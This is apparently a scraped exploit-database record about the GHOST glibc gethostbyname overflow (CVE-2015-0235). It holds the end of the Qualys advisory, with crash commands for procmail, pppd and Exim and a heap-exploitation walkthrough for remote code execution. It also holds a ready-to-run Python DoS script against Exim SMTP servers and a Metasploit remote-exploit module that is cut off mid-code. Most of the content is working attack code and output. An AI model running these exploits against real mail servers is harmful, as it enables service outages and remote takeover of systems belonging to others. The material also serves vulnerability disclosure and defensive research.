\n \n----[ 4.5 - procmail ]-------------------------------------------------------- \n \nprocmail (a SUID-root and SGID-mail binary) is vulnerable through its \n\"comsat/biff\" feature: \n \n#define COMSAThost \"localhost\" /* where the biff/comsat daemon lives */ \n... \n#define SERV_ADDRsep '@' /* when overriding in COMSAT=serv@addr */ \n \nint setcomsat(chp)const char*chp; \n{ char*chad; ... \nchad=strchr(chp,SERV_ADDRsep); /* @ separator? */ \n... \nif(chad) \n*chad++='\\0'; /* split the specifier */ \nif(!chad||!*chad) /* no host */ \n#ifndef IP_localhost /* Is \"localhost\" preresolved? */ \nchad=COMSAThost; /* nope, use default */ \n#else /* IP_localhost */ \n{ ... \n} \nelse \n#endif /* IP_localhost */ \n{ ... \nif(!(host=gethostbyname(chad))||!host->h_0addr_list) \n \nuser@debian-7-2-32b:~$ ls -l /usr/bin/procmail \n-rwsr-sr-x 1 root mail 83912 Jun 6 2012 /usr/bin/procmail \n \nuser@debian-7-2-32b:~$ /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c \"print '0' * $((0x500-16*1-2*4-1-4))\"` < /dev/null \n... \n*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x0980de30 *** \n======= Backtrace: ========= \n/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x70f01)[0xb76b2f01] \n/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x72768)[0xb76b4768] \n/lib/i386-linux-gnu/i686/cmov/libc.so.6(cfree+0x6d)[0xb76b781d] \n/usr/bin/procmail[0x80548ec] \n/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7658e46] \n/usr/bin/procmail[0x804bb55] \n======= Memory map: ======== \n... \n0980a000-0982b000 rw-p 00000000 00:00 0 [heap] \n... \nAborted \n \nuser@debian-7-2-32b:~$ _COMSAT_='COMSAT=@'`python -c \"print '0' * $((0x500-16*1-2*4-1-4))\"` \n \nuser@debian-7-2-32b:~$ /usr/bin/procmail \"$_COMSAT_\" \"$_COMSAT_\"1234 < /dev/null \nSegmentation fault \n \nuser@debian-7-2-32b:~$ /usr/bin/procmail \"$_COMSAT_\"12345670 \"$_COMSAT_\"123456701234 < /dev/null \nSegmentation fault \n \nuser@debian-7-2-32b:~$ dmesg \n... 
\n[211409.564917] procmail[4549]: segfault at c ip b768e5a4 sp bfcb53d8 error 4 in libc-2.13.so[b761c000+15c000] \n[211495.820710] procmail[4559]: segfault at b8cb290c ip b763c5a4 sp bf870c98 error 4 in libc-2.13.so[b75ca000+15c000] \n \n----[ 4.6 - pppd ]------------------------------------------------------------ \n \npppd (yet another SUID-root binary) calls gethostbyname() if a \npreliminary call to inet_addr() (a simple wrapper around inet_aton()) \nfails. \"The inet_addr() function converts the Internet host address cp \nfrom IPv4 numbers-and-dots notation into binary data in network byte \norder. If the input is invalid, INADDR_NONE (usually -1) is returned. \nUse of this function is problematic because -1 is a valid address \n(255.255.255.255).\" A failure for inet_addr(), but a success for \ninet_aton(), and consequently a path to the buffer overflow. \n \nuser@ubuntu-12-04-32b:~$ ls -l /usr/sbin/pppd \n-rwsr-xr-- 1 root dip 273272 Feb 3 2011 /usr/sbin/pppd \n \nuser@ubuntu-12-04-32b:~$ id \nuid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev) \n \n------[ 4.6.1 - ms-dns option ]----------------------------------------------- \n \nstatic int \nsetdnsaddr(argv) \nchar **argv; \n{ \nu_int32_t dns; \nstruct hostent *hp; \n \ndns = inet_addr(*argv); \nif (dns == (u_int32_t) -1) { \nif ((hp = gethostbyname(*argv)) == NULL) { \noption_error(\"invalid address parameter '%s' for ms-dns option\", \n*argv); \nreturn 0; \n} \ndns = *(u_int32_t *)hp->h_addr; \n} \n \nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c \"print '0' * $((0x1000-16*1-2*4-16-4))\"`'377.255.255.255' \n*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09c0f928 *** \n======= Backtrace: ========= \n/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb75e1ee2] \n/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb75d1db5] \n/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75d1deb] \n/usr/sbin/pppd(options_from_file+0xa8)[0x8064948] 
\n/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e] \n/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4] \n/usr/sbin/pppd(main+0x1cf)[0x8050b2f] \n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb75854d3] \n======= Memory map: ======== \n... \n09c0c000-09c2d000 rw-p 00000000 00:00 0 [heap] \n... \nAborted (core dumped) \n \n------[ 4.6.2 - ms-wins option ]---------------------------------------------- \n \nstatic int \nsetwinsaddr(argv) \nchar **argv; \n{ \nu_int32_t wins; \nstruct hostent *hp; \n \nwins = inet_addr(*argv); \nif (wins == (u_int32_t) -1) { \nif ((hp = gethostbyname(*argv)) == NULL) { \noption_error(\"invalid address parameter '%s' for ms-wins option\", \n*argv); \nreturn 0; \n} \nwins = *(u_int32_t *)hp->h_addr; \n} \n \nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-wins' `python -c \"print '0' * $((0x1000-16*1-2*4-16-4))\"`'377.255.255.255' \n*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x08a64928 *** \n======= Backtrace: ========= \n/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb757aee2] \n/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb756adb5] \n/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb756adeb] \n/usr/sbin/pppd(options_from_file+0xa8)[0x8064948] \n/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e] \n/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4] \n/usr/sbin/pppd(main+0x1cf)[0x8050b2f] \n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb751e4d3] \n======= Memory map: ======== \n... \n08a61000-08a82000 rw-p 00000000 00:00 0 [heap] \n... \nAborted (core dumped) \n \n------[ 4.6.3 - socket option ]----------------------------------------------- \n \nstatic int \nopen_socket(dest) \nchar *dest; \n{ \nchar *sep, *endp = NULL; \nint sock, port = -1; \nu_int32_t host; \nstruct hostent *hent; \n... 
\nsep = strchr(dest, ':'); \nif (sep != NULL) \nport = strtol(sep+1, &endp, 10); \nif (port < 0 || endp == sep+1 || sep == dest) { \nerror(\"Can't parse host:port for socket destination\"); \nreturn -1; \n} \n*sep = 0; \nhost = inet_addr(dest); \nif (host == (u_int32_t) -1) { \nhent = gethostbyname(dest); \nif (hent == NULL) { \nerror(\"%s: unknown host in socket option\", dest); \n*sep = ':'; \nreturn -1; \n} \nhost = *(u_int32_t *)(hent->h_addr_list[0]); \n} \n \nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'socket' `python -c \"print '0' * $((0x1000-16*1-2*4-16-4))\"`'377.255.255.255:1' \nuser@ubuntu-12-04-32b:~$ *** glibc detected *** /usr/sbin/pppd: malloc(): memory corruption: 0x09cce270 *** \n \n----[ 4.7 - Exim ]------------------------------------------------------------ \n \nThe Exim mail server is exploitable remotely if configured to perform \nextra security checks on the HELO and EHLO commands (\"helo_verify_hosts\" \nor \"helo_try_verify_hosts\" option, or \"verify = helo\" ACL); we developed \na reliable and fully-functional exploit that bypasses all existing \nprotections (ASLR, PIE, NX) on 32-bit and 64-bit machines. 
\n \nuser@debian-7-7-64b:~$ grep helo /var/lib/exim4/config.autogenerated | grep verify \nhelo_verify_hosts = * \n \nuser@debian-7-7-64b:~$ python -c \"print '0' * $((0x500-16*1-2*8-1-8))\" \n000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \n \nuser@debian-7-7-64b:~$ telnet 127.0.0.1 25 \nTrying 127.0.0.1... \nConnected to 127.0.0.1. \nEscape character is '^]'. \n220 debian-7-7-64b ESMTP Exim 4.80 ... 
\nHELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \nConnection closed by foreign host. \n \nuser@debian-7-7-64b:~$ dmesg \n... \n[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000] \n \n \n--[ 5 - Exploitation ]-------------------------------------------------------- \n \n----[ 5.1 - Code execution ]-------------------------------------------------- \n \nIn this section, we describe how we achieve remote code execution \nagainst the Exim SMTP mail server, bypassing the NX (No-eXecute) \nprotection and glibc's malloc hardening. 
\n \nFirst, we overflow gethostbyname's heap-based buffer and partially \noverwrite the size field of the next contiguous free chunk of memory \nwith a slightly larger size (we overwrite only 3 bytes of the size \nfield; in any case, we cannot overflow more than 4 bytes on 32-bit \nmachines, or 8 bytes on 64-bit machines): \n \n \n|< malloc_chunk \n| \n-----|----------------------|---+--------------------|----- \n... | gethostbyname buffer |p|s|f|b|F|B| free chunk | ... \n-----|----------------------|---+--------------------|----- \n| X| \n|------------------------->| \noverflow \n \nwhere: \n \nstruct malloc_chunk { \n \nINTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ \nINTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ \n \nstruct malloc_chunk* fd; /* double links -- used only if free. */ \nstruct malloc_chunk* bk; \n \n/* Only used for large blocks: pointer to next larger size. */ \nstruct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ \nstruct malloc_chunk* bk_nextsize; \n}; \n \nand: X marks the spot where the crucial memory corruption takes place. \n \n \nAs a result, this artificially-enlarged free chunk, which is managed by \nglibc's malloc, overlaps another block of memory, Exim's current_block, \nwhich is managed by Exim's internal memory allocator: \n \n \n|< malloc_chunk |< storeblock \n| | \n-----|----------------------|------------------------|---------------+---|----- \n... | gethostbyname buffer |p|s|f|b|F|B| free chunk |n|l| current_block | ... \n-----|----------------------|------------------------|---------------+---|----- \n| | \n|<-------------------------------------->| \nartificially enlarged free chunk \n \nwhere: \n \ntypedef struct storeblock { \nstruct storeblock *next; \nsize_t length; \n} storeblock; \n \n \nThen, we partially allocate the enlarged free chunk and overwrite the \nbeginning of Exim's current_block of memory (the \"storeblock\" structure) \nwith arbitrary data. 
In particular, we overwrite its \"next\" field: \n \n \n|< malloc_chunk |< storeblock \n| | \n-----|----------------------|------------------------|--------+----------|----- \n... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaaaaa |n|l| current_block | ... \n-----|----------------------|------------------------|--------+----------|----- \n| X | \n|<------------------------------->| \nallocated chunk \n \n \nThis effectively turns gethostbyname's buffer overflow into a \nwrite-anything-anywhere primitive, because we control both the pointer \nto the next block of memory returned by Exim's allocator (the hijacked \n\"next\" pointer) and the data allocated (a null-terminated string, the \nargument of an SMTP command we send to Exim). \n \nFinally, we use this write-anything-anywhere primitive to overwrite \nExim's run-time configuration, which is cached in the heap memory. More \nprecisely, we overwrite Exim's Access Control Lists (ACLs), and achieve \narbitrary command execution thanks to Exim's \"${run{<command> <args>}}\" \nstring expansion mechanism: \n \n|< storeblock \n| \n-----|-------------------------------|---------------|-------------------|----- \n... | Exim's run-time configuration | ... .. .. ... |n|l| current_block | ... \n-----|----x--------------------------|---------------|x------------------|----- \n| | \n'<------------------------------------------' \nhijacked next pointer \n \n \n|< ACLs >| \n-----|----+-----+--------+------+----|---------------|-------------------|----- \n... | Exim's run-time configuration | ... .. .. ... | old current_block | ... \n-----|----+-----+--------+------+----|---------------|-------------------|----- \n| XXXXXXXX | \n|<------------------->| \nnew current_block \n \n \n----[ 5.2 - Information leak ]------------------------------------------------ \n \nThe success of this exploit depends on an important piece of \ninformation: the address of Exim's run-time configuration in the heap. 
\nIn this section, we describe how we obtain this address, bypassing the \nASLR (Address Space Layout Randomization) and PIE (Position Independent \nExecutable) protections. \n \nFirst, we overflow gethostbyname's heap-based buffer and partially \noverwrite the size field of the next contiguous free chunk of memory \nwith a slightly larger size: \n \n \n|< malloc_chunk \n| \n-----|----------------------|---+-------------------------|----- \n... | gethostbyname buffer |p|s|f|b|F|B| next free chunk | ... \n-----|----------------------|---+-------------------------|----- \n| X| \n|------------------------->| \noverflow \n \n \nAs a result, this artificially-enlarged free chunk overlaps another \nblock of memory, where Exim saves the error message \"503 sender not yet \ngiven\\r\\n\" for later use: \n \n \n|< malloc_chunk \n| \n-----|----------------------|-----------------------------|----------+----|----- \n... | gethostbyname buffer |p|s|f|b|F|B| real free chunk | error message | ... \n-----|----------------------|-----------------------------|----------+----|----- \n| | \n|<-------------------------------------->| \nartificially enlarged free chunk \n \n \nThen, we partially allocate the artificially-enlarged free chunk, \nthereby splitting it in two: the newly allocated chunk, and a smaller, \nfree chunk (the remainder from the split). The malloc_chunk header for \nthis remaining free chunk overwrites the very beginning of the saved \nerror message with a pointer to the heap (the fd_nextsize pointer): \n \n \n|< malloc_chunk |< malloc_chunk \n| | \n-----|----------------------|---------------------+-------|----------+----|----- \n... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaa |p|s|f|b|F|B| r message | ... 
\n-----|----------------------|---------------------+-------|----------+----|----- \n| | X | \n|<------------------->|<---------------->| \nallocated chunk free chunk \n \n \nFinally, we send an invalid SMTP command to Exim, and retrieve the \nfd_nextsize heap pointer from Exim's SMTP response, which includes the \ncorrupted error message. This effectively turns gethostbyname's buffer \noverflow into an information leak; moreover, it allows us to distinguish \nbetween 32-bit and 64-bit machines. \n \n \n--[ 6 - Acknowledgments ]----------------------------------------------------- \n \nWe would like to thank Alexander Peslyak of the Openwall Project for his \nhelp with the disclosure process of this vulnerability. \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130115/Qualys-CVE-2015-0235.txt"}, {"lastseen": "2016-12-05T22:19:15", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-29T00:00:00", "published": "2015-01-29T00:00:00", "href": "https://packetstormsecurity.com/files/130171/Exim-ESMTP-GHOST-Denial-Of-Service.html", "id": "PACKETSTORM:130171", "type": "packetstorm", "title": "Exim ESMTP GHOST Denial Of Service", "sourceData": "`The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash. \n \n#!/usr/bin/python \n# Exim ESMTP DoS Exploit by 1N3 v20150128 \n# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow \n# http://crowdshield.com \n# \n# USAGE: python ghost-smtp-dos.py <ip> <port> \n# \n# Escape character is '^]'. \n# 220 debian-7-7-64b ESMTP Exim 4.80 ... 
\n# HELO \n# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \n00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \n# Connection closed by foreign host. \n# \n# user () debian-7-7-64b:~$ dmesg \n# ... 
\n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in \n# libc-2.13.so[7fabef2a2000+182000] \n \nimport socket \nimport time \nimport sys, getopt \n \ndef main(argv): \nargc = len(argv) \n \nif argc <= 1: \nprint \"usage: %s <host>\" % (argv[0]) \nsys.exit(0) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nbuffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \n00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\" \n \ntarget = argv[1] # SET TARGET \nport = argv[2] # SET PORT \n \nprint \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\" \nprint \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer)) \ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nconnect=s.connect((target,int(port))) \ndata = s.recv(1024) 
\nprint \"CONNECTION: \" +data \ns.send('HELO ' + buffer + '\\r\\n') \ndata = s.recv(1024) \nprint \"received: \" +data \ns.send('EHLO ' + buffer + '\\r\\n') \ndata = s.recv(1024) \nprint \"received: \" +data \ns.close() \n \nmain(sys.argv) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/130171/ghost-smtp-dos.py.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:21:00", "bulletinFamily": "exploit", "description": "", "modified": "2015-03-24T00:00:00", "published": "2015-03-24T00:00:00", "href": "https://packetstormsecurity.com/files/130974/Exim-GHOST-glibc-gethostbyname-Buffer-Overflow.html", "id": "PACKETSTORM:130974", "type": "packetstorm", "title": "Exim GHOST (glibc gethostbyname) Buffer Overflow", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow', \n'Description' => %q( \nThis module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based \nbuffer overflow in the GNU C Library's gethostbyname functions) on x86 \nand x86_64 GNU/Linux systems that run the Exim mail server. \n \nFor additional information, please refer to the module's References \nsection. \n), \n'Author' => ['Qualys, Inc. 
<qsa[at]qualys.com>'], \n'License' => BSD_LICENSE, \n'References' => [ \n['CVE', '2015-0235'], \n['US-CERT-VU', '967332'], \n['OSVDB', '117579'], \n['BID', '72325'], \n['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt'], \n['URL', 'https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability'], \n['URL', 'http://r-7.co/1CAnMc0'] # MSF Wiki doc (this module's manual) \n], \n'DisclosureDate' => 'Jan 27 2015', \n'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim) \n'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload \n'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^ \n'Payload' => { \n'Space' => 255, # the shorter the payload, the higher the probability of code execution \n'BadChars' => \"\", # we encode the payload ourselves, because ^ \n'DisableNops' => true, \n'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell \n}, \n'Targets' => [['Automatic', {}]], \n'DefaultTarget' => 0 \n)) \n \nregister_options([ \nOpt::RPORT(25), \nOptAddress.new('SENDER_HOST_ADDRESS', [true, \n'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil]) \n], self.class) \n \nregister_advanced_options([ \nOptBool.new('FORCE_EXPLOIT', [false, 'Let the exploit run anyway without the check first', nil]) \n], self.class) \nend \n \ndef check \n# for now, no information about the vulnerable state of the target \ncheck_code = Exploit::CheckCode::Unknown \n \nbegin \n# not exploiting, just checking \nsmtp_connect(false) \n \n# malloc()ate gethostbyname's buffer, and \n# make sure its next_chunk isn't the top chunk \n \n9.times do \nsmtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0) \nsmtp_recv(HELO_CODES) \nend \n \n# overflow (4 bytes) gethostbyname's buffer, and \n# overwrite its next_chunk's size field with 0x00303030 \n \nsmtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 
1024+16-1+4) \n# from now on, an exception means vulnerable \ncheck_code = Exploit::CheckCode::Vulnerable \n# raise an exception if no valid SMTP reply \nreply = smtp_recv(ANY_CODE) \n# can't determine vulnerable state if smtp_verify_helo() isn't called \nreturn Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ \n \n# realloc()ate gethostbyname's buffer, and \n# crash (old glibc) or abort (new glibc) \n# on the overwritten size field \n \nsmtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4) \n# raise an exception if no valid SMTP reply \nreply = smtp_recv(ANY_CODE) \n# can't determine vulnerable state if smtp_verify_helo() isn't called \nreturn Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ \n# a vulnerable target should've crashed by now \ncheck_code = Exploit::CheckCode::Safe \n \nrescue \npeer = \"#{rhost}:#{rport}\" \nvprint_debug(\"#{peer} - Caught #{$!.class}: #{$!.message}\") \n \nensure \nsmtp_disconnect \nend \n \nreturn check_code \nend \n \ndef exploit \nunless datastore['FORCE_EXPLOIT'] \nprint_status(\"Checking if target is vulnerable...\") \nfail_with(\"exploit\", \"Vulnerability check failed.\") if check != Exploit::CheckCode::Vulnerable \nprint_good(\"Target is vulnerable.\") \nend \ninformation_leak \ncode_execution \nend \n \nprivate \n \nHELO_CODES = '250|451|550' \nANY_CODE = '[0-9]{3}' \n \nMIN_HEAP_SHIFT = 80 \nMIN_HEAP_SIZE = 128 * 1024 \nMAX_HEAP_SIZE = 1024 * 1024 \n \n# Exim \nALIGNMENT = 8 \nSTORE_BLOCK_SIZE = 8192 \nSTOREPOOL_MIN_SIZE = 256 \n \nLOG_BUFFER_SIZE = 8192 \nBIG_BUFFER_SIZE = 16384 \n \nSMTP_CMD_BUFFER_SIZE = 16384 \nIN_BUFFER_SIZE = 8192 \n \n# GNU C Library \nPREV_INUSE = 0x1 \nNS_MAXDNAME = 1025 \n \n# Linux \nMMAP_MIN_ADDR = 65536 \n \ndef fail_with(fail_subject, message) \nmessage = \"#{message}. 
For more info: http://r-7.co/1CAnMc0\" \nsuper(fail_subject, message) \nend \n \ndef information_leak \nprint_status(\"Trying information leak...\") \nleaked_arch = nil \nleaked_addr = [] \n \n# try different heap_shift values, in case Exim's heap address contains \n# bad chars (NUL, CR, LF) and was mangled during the information leak; \n# we'll keep the longest one (the least likely to have been truncated) \n \n16.times do \ndone = catch(:another_heap_shift) do \nheap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15) \nprint_debug(\"#{{ heap_shift: heap_shift }}\") \n \n# write the malloc_chunk header at increasing offsets (8-byte step), \n# until we overwrite the \"503 sender not yet given\" error message \n \n128.step(256, 8) do |write_offset| \nerror = try_information_leak(heap_shift, write_offset) \nprint_debug(\"#{{ write_offset: write_offset, error: error }}\") \nthrow(:another_heap_shift) if not error \nnext if error == \"503 sender not yet given\" \n \n# try a few more offsets (allows us to double-check things, \n# and distinguish between 32-bit and 64-bit machines) \n \nerror = [error] \n1.upto(5) do |i| \nerror[i] = try_information_leak(heap_shift, write_offset + i*8) \nthrow(:another_heap_shift) if not error[i] \nend \nprint_debug(\"#{{ error: error }}\") \n \n_leaked_arch = leaked_arch \nif (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize \n(error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd \n(error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size \n(error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing() \nleaked_arch = ARCH_X86_64 \n \nelsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize \n(error[1].empty? 
or (error[1].unpack('C')[0] & 3) == 0) and # fd \n(error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size \n(error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing() \nleaked_arch = ARCH_X86 \n \nelse \nthrow(:another_heap_shift) \nend \nprint_debug(\"#{{ leaked_arch: leaked_arch }}\") \nfail_with(\"infoleak\", \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch \n \n# try different large-bins: most of them should be empty, \n# so keep the most frequent fd_nextsize address \n# (a pointer to the malloc_chunk itself) \n \ncount = Hash.new(0) \n0.upto(9) do |last_digit| \nerror = try_information_leak(heap_shift, write_offset, last_digit) \nnext if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes \nnext if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK \ncount[error] += 1 \nend \nprint_debug(\"#{{ count: count }}\") \nthrow(:another_heap_shift) if count.empty? \n \n# convert count to a nested array of [key, value] arrays and sort it \nerror_count = count.sort { |a, b| b[1] <=> a[1] } \nerror_count = error_count.first # most frequent \nerror = error_count[0] \ncount = error_count[1] \nthrow(:another_heap_shift) unless count >= 6 # majority \nleaked_addr.push({ error: error, shift: heap_shift }) \n \n# common-case shortcut \nif (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or \n(leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?) \nleaked_addr = [leaked_addr.last] # use this one, and not another \nthrow(:another_heap_shift, true) # done \nend \nthrow(:another_heap_shift) \nend \nthrow(:another_heap_shift) \nend \nbreak if done \nend \n \nfail_with(\"infoleak\", \"not vuln? old glibc? (no leaked_arch)\") if leaked_arch.nil? \nfail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty? 
\n \nleaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length } \nleaked_addr = leaked_addr.first # longest \nerror = leaked_addr[:error] \nshift = leaked_addr[:shift] \n \nleaked_addr = 0 \n(leaked_arch == ARCH_X86 ? 4 : 8).times do |i| \nbreak if i >= error.length \nleaked_addr += error.unpack('C*')[i] * (2**(i*8)) \nend \n# leaked_addr should point to the beginning of Exim's smtp_cmd_buffer: \nleaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE \nfail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR \n \nprint_good(\"Successfully leaked_arch: #{leaked_arch}\") \nprint_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\") \n@leaked = { arch: leaked_arch, addr: leaked_addr } \nend \n \ndef try_information_leak(heap_shift, write_offset, last_digit = 9) \nfail_with(\"infoleak\", \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT) \nfail_with(\"infoleak\", \"heap_shift\") if (heap_shift & 15) != 0 \nfail_with(\"infoleak\", \"write_offset\") if (write_offset & 7) != 0 \nfail_with(\"infoleak\", \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/ \n \nsmtp_connect \n \n# bulletproof Heap Feng Shui; the hard part is avoiding: \n# \"Too many syntax or protocol errors\" (3) \n# \"Too many unrecognized commands\" (3) \n# \"Too many nonmail commands\" (10) \n \nsmtp_send(\"HELO \", 